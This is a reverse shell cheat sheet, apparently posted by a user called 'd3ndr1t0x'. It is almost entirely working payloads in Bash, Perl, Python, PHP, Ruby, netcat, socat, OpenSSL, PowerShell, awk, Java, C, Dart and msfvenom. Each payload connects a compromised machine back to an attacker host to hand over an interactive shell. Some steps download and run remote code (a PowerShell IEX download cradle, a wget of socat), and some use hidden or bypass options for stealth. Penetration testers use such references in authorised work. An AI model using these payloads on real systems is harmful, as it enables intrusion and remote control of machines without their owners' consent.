d3ndr1t0x  

Reverse Shell Cheat Sheet

You know what this is.


1. Bash Reverse Shell

TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

UDP

Victim:

sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:

nc -u -lvp 4242

2. Perl Reverse Shell

perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);
$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");
STDIN->fdopen($c,r);$~->fdopen($c,w);
system$_ while<>;'

Windows only:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");
STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

3. Python Reverse Shell

Linux IPv4

export RHOST="10.0.0.1"; export RPORT=4242;
python -c 'import socket,os,pty;
s=socket.socket();
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4242));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"])'

IPv6

python -c 'import socket,os,pty;
s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);
s.connect(("dead:beef:2::125c",4242,0,2));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")'

Windows (Python 3)

python.exe -c "import socket,os,threading,subprocess as sp;
p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);
s=socket.socket();
s.connect(('10.0.0.1',4242));
threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();
threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"

4. PHP Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

5. Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e'exit if fork;
c=TCPSocket.new("10.0.0.1","4242");
loop{
  c.gets.chomp!;
  (exit! if $_=="exit");
  ($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))
  rescue c.puts "failed: #{$_}"
}'

Windows only:

ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4242");
while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

6. Netcat Reverse Shells

Traditional (if -e supported)

nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

OpenBSD netcat (no -e)

rm -f /tmp/f; mkfifo /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f

BusyBox netcat

rm -f /tmp/f; mknod /tmp/f p;
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f

7. Ncat Reverse Shell

ncat 10.0.0.1 4242 -e /bin/bash
ncat --udp 10.0.0.1 4242 -e /bin/bash

8. Socat Reverse Shell

Listener (attacker):

socat file:`tty`,raw,echo=0 tcp-listen:4242

Victim:

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

Download static socat binary (if not installed):

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

9. OpenSSL Encrypted Reverse Shell

Attacker side:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4242

Or:

ncat --ssl -vv -l -p 4242

Victim side:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s

10. TLS-PSK Reverse Shell (No Certificates)

Generate PSK:

openssl rand -hex 48

Server:

export LHOST="*"; export LPORT="4242"; export PSK="YOUR_PSK";
openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT

Client:

export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="YOUR_PSK";
export PIPE="/tmp/$(openssl rand -hex 4)";
mkfifo $PIPE;
/bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE

11. PowerShell Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);
$stream=$client.GetStream();
[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback+'PS '+(pwd).Path+'> ';
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()"

Or download and execute script:

IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

12. Awk Reverse Shell

awk 'BEGIN {
  s = "/inet/tcp/0/10.0.0.1/4242";
  while(42) {
    do {
      printf "shell>" |& s;
      s |& getline c;
      if(c) {
        while ((c |& getline) > 0) print $0 |& s;
        close(c);
      }
    } while(c != "exit")
    close(s);
  }
}' /dev/null

13. Java Reverse Shells

Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do $line 2>&5 >&5; done'");
p.waitFor();
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0) so.write(pi.read());
    while(pe.available()>0) so.write(pe.read());
    while(si.available()>0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue(); break;} catch (Exception e) {}
}
p.destroy();
s.close();

14. Groovy Reverse Shell

Same as the Java example above. Can be wrapped in a thread for stealth:

Thread.start {
  // Reverse shell code here
}

15. C Reverse Shell (Compile and run)

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4242;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);

    return 0;
}

Compile with:

gcc /tmp/shell.c -o csh && ./csh

16. Dart Reverse Shell

import 'dart:io';
import 'dart:convert';

main() {
  Socket.connect("10.0.0.1", 4242).then((socket) {
    socket.listen((data) {
      Process.start('powershell.exe', []).then((Process process) {
        process.stdin.writeln(new String.fromCharCodes(data).trim());
        process.stdout
          .transform(utf8.decoder)
          .listen((output) { socket.write(output); });
      });
    },
    onDone: () {
      socket.destroy();
    });
  });
}

17. Meterpreter Reverse Shell Payloads (msfvenom)

# Windows staged reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe

# Windows stageless reverse TCP
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe

# Linux staged reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf > reverse.elf

# Linux stageless reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf > reverse.elf

# Other platforms/formats:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f macho > shell.macho
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > shell.war
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f raw > shell.php

18. Spawning an Interactive TTY Shell (Upgrading)

rlwrap nc -lvnp 4242

Make shell fully interactive:

ctrl+z
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <num>

If using zsh:

stty raw -echo; fg

Note: OhMyZSH may cause issues. Use plain sh or bash.


bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
